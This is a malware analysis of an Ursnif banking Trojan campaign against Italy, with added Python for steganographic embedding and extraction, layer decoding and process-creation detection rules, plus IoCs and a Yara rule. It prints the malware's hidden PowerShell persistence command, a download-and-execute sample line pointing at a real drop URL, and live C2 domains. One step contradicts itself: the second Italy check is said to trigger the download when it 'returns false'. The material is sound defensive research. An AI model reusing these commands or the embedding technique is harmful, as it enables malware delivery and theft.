An Example Analysis of the Ursnif Banking Trojan Targeting Italy

2025-01-15 update. From: SLTechnology News&Howtos, Network Security


Shulou (Shulou.com) 05/31 report


This article is for technical research and discussion only. Illegal use is strictly prohibited, and any consequences of such use are the reader's own responsibility.

Introduction

Recently another wave of Ursnif attacks has swept across Italy.

Ursnif, also known as Gozi, is currently one of the most active banking Trojans. It is a variant of the Gozi-ISFB banking Trojan, and since the Trojan's source code leaked in 2014 attackers have kept upgrading and extending Gozi's functionality. This variant also carries an attack "weapon" aimed at Office documents: a malicious VBA macro that acts as a dropper and launches an obfuscated PowerShell script to hide the real payload. Ursnif additionally uses steganography to hide malicious code and evade AV detection.

This variant also uses the QueueUserAPC process-injection technique to inject its malicious code into explorer.exe. That is stealthier than the classic approach because no remote thread has to be created in the target process.

Technical analysis

The initial infection vector is an Excel file, usually named as a purchase order or an invoice, whose content appears unreadable until the user enables macros.

During our analysis of the sample we extracted the malicious macro code and found that it uses the Application.International property of MS Office to check the user's country. If the country code returned is Italy's (code 39), the macro uses the Shell function to execute the next stage of the attack.

The remaining macro functions mainly prepare the shell command for execution, splicing and encoding strings in various ways. The final command contains a large number of binary strings, each of which is parsed as a base-2 number and cast to a character to build a new PowerShell command:

[Convert]::ToInt16() -as [char]

The resulting command tries to download an image from at least one of two embedded URLs:

https://images2.imgbox[.]com/55/c4/rBzwpAzi_o.png
https://i.postimg[.]cc/PH6QvFvF/mario.png?dl=1

This apparently legitimate image actually carries a new PowerShell command. The attacker built the malicious image with the Invoke-PSImage script, a tool that embeds the bytes of a script into the pixels of a PNG file.
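The following Python is an added example (not code from the original analysis and not Invoke-PSImage itself) that shows the pixel-level mechanism the loader relies on, and why a scanner looking at the image data never sees the script. It works on a list of (R, G, B) pixels in raster order; a real PNG would be turned into such a list with Pillow's Image.open(path).convert("RGB").getdata(). The nibble layout is assumed from the one-liner Invoke-PSImage generates (high nibble in the low 4 bits of blue, low nibble in the low 4 bits of green, red untouched) and should be checked against the loader in your own sample. The cover image and the hidden script are constructed stand-ins.

```python
import random

# Added example: Invoke-PSImage style pixel steganography over an (R, G, B)
# pixel list in raster order. Nibble layout assumed from the generated loader
# one-liner: one payload byte per pixel, high nibble in the low 4 bits of blue,
# low nibble in the low 4 bits of green. Red is left untouched.


def embed_psimage(pixels, payload):
    """Return a copy of pixels with payload written into the G/B low nibbles."""
    if len(payload) > len(pixels):
        raise ValueError("cover image has fewer pixels than payload bytes")
    out = list(pixels)
    for i, byte in enumerate(payload):
        r, g, b = pixels[i]
        out[i] = (r, (g & 0xF0) | (byte & 0x0F), (b & 0xF0) | (byte >> 4))
    return out


def extract_psimage(pixels, length):
    """Rebuild `length` bytes the way the loader does: (B & 15) * 16 | (G & 15)."""
    return bytes(((b & 0x0F) << 4) | (g & 0x0F) for _, g, b in pixels[:length])


def max_channel_delta(before, after):
    """Largest per-channel change the embedding caused (why the image looks intact)."""
    return max(abs(x - y) for pa, pb in zip(before, after) for x, y in zip(pa, pb))


def raw_channels(pixels):
    """The decoded image data as one byte string, i.e. what a naive scanner sees."""
    return bytes(c for px in pixels for c in px)


def make_cover(width, height, seed=1):
    """Constructed pseudo-random cover image, a stand-in for the real PNG."""
    rng = random.Random(seed)
    return [(rng.randrange(256), rng.randrange(256), rng.randrange(256))
            for _ in range(width * height)]


# Constructed stand-in for the hidden second stage (the real one is obfuscated).
PAYLOAD = b"Get-Culture | Format-List -Property *"


def demo():
    """Round-trip the payload through a cover image and report what a scanner sees."""
    cover = make_cover(64, 32)
    stego = embed_psimage(cover, PAYLOAD)
    return {
        "recovered": extract_psimage(stego, len(PAYLOAD)),
        "max_delta": max_channel_delta(cover, stego),
        "plaintext_visible": PAYLOAD in raw_channels(stego),
    }


if __name__ == "__main__":
    print(demo())
```

Because every payload byte is split across two channels and only the low nibble of each is touched, no channel value moves by more than 15 and the script never appears as a contiguous byte run in the image data. Detection therefore has to key on the loader (the GetPixel loop plus IEX) rather than on the image.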

The result is another obfuscated PowerShell script. Its payload is Base64 encoded, so it is easy to unpack:

The decoded content is in turn hexadecimal encoded and can be decoded with the same [Convert]::ToInt16 call, this time with base 16.
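The Python below is an added analyst-side example, not the malware's own code, that mirrors the two [Convert]::ToInt16 conversions (base 2 for the macro's binary strings, base 16 for the hex stage) and the Base64 step as reusable decoders, then peels the layers off in order the way you need to when a sample stacks them. The sample blob is constructed from a one-line script; the URL inside it is the page's second drop URL, defanged. Everything else (function names, the printable-text check) is this example's own design.

```python
import base64
import re

# Added example: peel the encoding layers this chain stacks. Not the malware's code.
_BINARY_TOKEN = re.compile(r"^[01]{7,16}$")
_HEX_RUN = re.compile(r"^(?:[0-9a-fA-F]{2})+$")
_B64_RUN = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def _printable(text):
    """Decoded layers must look like script text, otherwise the guess was wrong."""
    return all(32 <= ord(c) < 127 or c in "\t\r\n" for c in text)


def decode_binary_tokens(text, sep=r"[\s,;|]+"):
    """Python mirror of the macro's [Convert]::ToInt16($tok, 2) -as [char]."""
    tokens = [t for t in re.split(sep, text.strip()) if t]
    if not tokens or not all(_BINARY_TOKEN.match(t) for t in tokens):
        raise ValueError("not a binary-token string")
    return "".join(chr(int(t, 2)) for t in tokens)


def decode_hex_string(text):
    """Mirror of [Convert]::ToInt16($pair, 16) -as [char] over two-digit groups."""
    compact = re.sub(r"\s+", "", text)
    if not _HEX_RUN.match(compact):
        raise ValueError("not a hex string")
    out = bytes.fromhex(compact).decode("latin-1")
    if not _printable(out):
        raise ValueError("hex decoded to non-text")
    return out


def decode_base64_text(text):
    """Base64 to text. -EncodedCommand payloads are UTF-16LE (ASCII bytes interleaved
    with NULs); FromBase64String payloads are usually plain ASCII. Detect the NULs."""
    compact = re.sub(r"\s+", "", text)
    if not _B64_RUN.match(compact) or len(compact) % 4:
        raise ValueError("not base64")
    raw = base64.b64decode(compact, validate=True)
    if len(raw) >= 2 and all(b == 0 for b in raw[1::2]):
        out = raw.decode("utf-16-le")
    else:
        out = raw.decode("latin-1")
    if not _printable(out):
        raise ValueError("base64 decoded to non-text")
    return out


# Most specific check first: a binary-token run with separators stripped is valid
# hex, and a hex run is valid Base64, so the order below avoids misclassification.
_LAYERS = (("binary", decode_binary_tokens),
           ("hex", decode_hex_string),
           ("base64", decode_base64_text))


def unwrap_layers(blob, max_depth=8):
    """Apply decoders until none applies; return (plaintext, layers peeled)."""
    history, current = [], blob
    for _ in range(max_depth):
        for name, fn in _LAYERS:
            try:
                nxt = fn(current)
            except (ValueError, UnicodeDecodeError):
                continue
            history.append(name)
            current = nxt
            break
        else:
            break
    return current, history


# Constructed sample: one script line wrapped hex -> Base64(UTF-16LE) -> binary
# tokens, the same kinds of layers the macro and the image stage use.
SAMPLE_SCRIPT = ('iex (New-Object Net.WebClient).DownloadString('
                 '"https://i.postimg[.]cc/PH6QvFvF/mario.png?dl=1")')


def build_sample_blob(script=SAMPLE_SCRIPT):
    hex_layer = script.encode("latin-1").hex()
    b64_layer = base64.b64encode(hex_layer.encode("utf-16-le")).decode("ascii")
    return " ".join(format(ord(c), "08b") for c in b64_layer)


if __name__ == "__main__":
    print(unwrap_layers(build_sample_blob()))
```

Running unwrap_layers on a real command line from the macro returns both the plaintext and the list of layers peeled, which is worth recording alongside the hashes: a change in layer order is often the first visible difference between campaigns.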

The final stage does the following.

The code checks once more whether the user is in Italy, using the culture information returned by the following command:

Get-Culture | Format-List -Property *

If that test returns false, the script downloads an EXE payload from http://fillialopago[.]info/~DF2F63, stores it as %TEMP%\Twain001.exe and executes it.

At the time of analysis, most antivirus engines did not detect the malicious file.

The executable is a typical Ursnif loader: it talks to the back-end server and downloads the malicious code that is later injected into the explorer.exe process. It uses the IWebBrowser.Navigate function to fetch that data from the malicious server felipllet[.]info, where the URI path is disguised as a video file (.avi).

The data in the server's response is encrypted, as shown in the figure of the original analysis.

After decryption, all useful data is stored under the following registry key:

HKCU\Software\AppDataLow\Software\Microsoft\{GUID}

The registry value "defrdisc" holds the command to be executed next; it runs automatically every time the target host starts:

The main purpose of that command is to execute the data held in the "cmiftall" value through the PowerShell engine:

C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E').cmiftall))"

The data in "cmiftall" is a hex-encoded PowerShell script, so what it does is easy to reconstruct:
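The persistence step above has a distinctive shape in process-creation telemetry: wmic.exe calling "process call create", a hidden PowerShell that reads a script out of HKCU:\Software\AppDataLow with get-itemproperty and hands it to iex, and (because Win32_Process.Create spawns through the WMI provider host) a powershell.exe whose parent is WmiPrvSE.exe rather than wmic.exe. The Python below is an added example, not part of the original analysis, that encodes those observations as triage rules and runs them over constructed process-creation records (a real feed would be Sysmon Event ID 1 or Windows event 4688). The malicious records are built from the command line quoted above; the benign records and all rule names are this example's own.

```python
import re

# Added example, not from the report: triage rules for the wmic/PowerShell
# persistence step, run over constructed process-creation records
# (dicts with parent, image, cmd). Rule names are this example's own.

REG_KEY = (r"HKCU:\Software\AppDataLow\Software\Microsoft"
           r"\94502524-E302-E68A-0D08-C77A91BCEB4E")
PS_CMD = ("powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString("
          "(get-itemproperty '" + REG_KEY + "').cmiftall))")
WMIC_CMD = (r"C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create "
            + '"' + PS_CMD + '"')

SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe", "cmd": WMIC_CMD},
    # Win32_Process.Create children are parented by WmiPrvSE.exe, not by wmic.exe.
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": PS_CMD},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\user\AppData\Local\Temp\Twain001.exe",
     "cmd": r"C:\Users\user\AppData\Local\Temp\Twain001.exe"},
    # Constructed benign admin activity, to show the rules stay quiet on it.
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe", "cmd": "wmic os get caption"},
]

_HIDDEN = re.compile(r"-w\S*\s+hidden")            # -w / -win / -windowstyle hidden
_IEX = re.compile(r"\biex\b|invoke-expression")
_REG_READ = re.compile(r"get-itemproperty|\bgp\b|getvalue\(")
_LOADER_PATH = re.compile(r"\\appdata\\local\\temp\\twain001\.exe$")


def classify(event):
    """Return the names of the rules an event trips (empty list if none)."""
    parent, image, cmd = (event[k].lower() for k in ("parent", "image", "cmd"))
    hits = []
    if image.endswith("wmic.exe") and "process call create" in cmd and "powershell" in cmd:
        hits.append("wmic_spawns_powershell")
    if image.endswith("powershell.exe") and parent.endswith("wmiprvse.exe"):
        hits.append("powershell_child_of_wmiprvse")
    if (_HIDDEN.search(cmd) and _IEX.search(cmd)
            and _REG_READ.search(cmd) and "appdatalow" in cmd):
        hits.append("registry_resident_script")
    if "/output:clipboard" in cmd:
        hits.append("wmic_output_to_clipboard")
    if _LOADER_PATH.search(image):
        hits.append("ursnif_loader_drop_path")
    return hits


def triage(events):
    """(index, hits) for every event that tripped at least one rule."""
    return [(i, h) for i, ev in enumerate(events) if (h := classify(ev))]


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["image"], hits)
```

The parent-process rule is the one worth keeping even after the GUID and value names change: a hidden PowerShell whose parent is WmiPrvSE.exe is rare on workstations, and the registry-resident script pattern (get-itemproperty feeding iex) is independent of this campaign's key names.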

Ursnif keeps its malicious code in registry values and uses this PowerShell script to stage it: the script allocates memory for a byte array containing the final payload and hands it to a legitimate process through QueueUserAPC and SleepEx. An APC queued this way runs when the target thread next enters an alertable wait, which is why no remote thread has to be created in explorer.exe.

Ursnif's complete infection chain is therefore: Excel macro (Italy check, binary-encoded PowerShell) > download of a steganographic PNG > Base64/hex-encoded second stage (second Italy check) > %TEMP%\Twain001.exe loader > encrypted response from felipllet[.]info > registry values under HKCU\Software\AppDataLow\Software\Microsoft\{GUID} > wmic-launched hidden PowerShell > QueueUserAPC injection into explorer.exe.

Indicators of compromise (IoC)

Hashes:
630b6f15c770716268c539c5558152168004657beee740e73ee9966d6de1753f (old sample)
f30454bcc7f1bc1f328b9b546f5906887fd0278c40d90ab75b8631ef18ed3b7f (new sample)
93dd4d7baf1e89d024c59dbffce1c4cbc85774a1b7bcc8914452dc8aa8a79a78 (final code)

Drop URLs:
https://images2.imgbox[.]com/55/c4/rBzwpAzi_o.png
https://i.postimg[.]cc/PH6QvFvF/mario.png?dl=1
https://fillialopago[.]info/~DF2F63
http://felipllet[.]info

C&C:
pereloplatka[.]host
roiboutique[.]ru
uusisnfbfaa[.]xyz
nolavalt[.]icu
sendertips[.]ru

IP:
185.158.248.142
185.158.248.143

Registry key:
HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E

Yara rule:

    import "pe"

    rule Ursnif_201902 {
        meta:
            description = "Yara rule for Ursnif loader - January version"
            author = "Yoroi - ZLab"
            last_updated = "2019-02-06"
            tlp = "white"
            category = "informational"
        strings:
            $a1 = "PADDINGXX"
            $a2 = { 66 66 66 66 66 66 66 }
        condition:
            all of ($a*) and pe.number_of_sections == 4 and
            (pe.version_info["OriginalFilename"] contains "Lumen.exe" or
             pe.version_info["OriginalFilename"] contains "PropositionReputation.exe")
    }
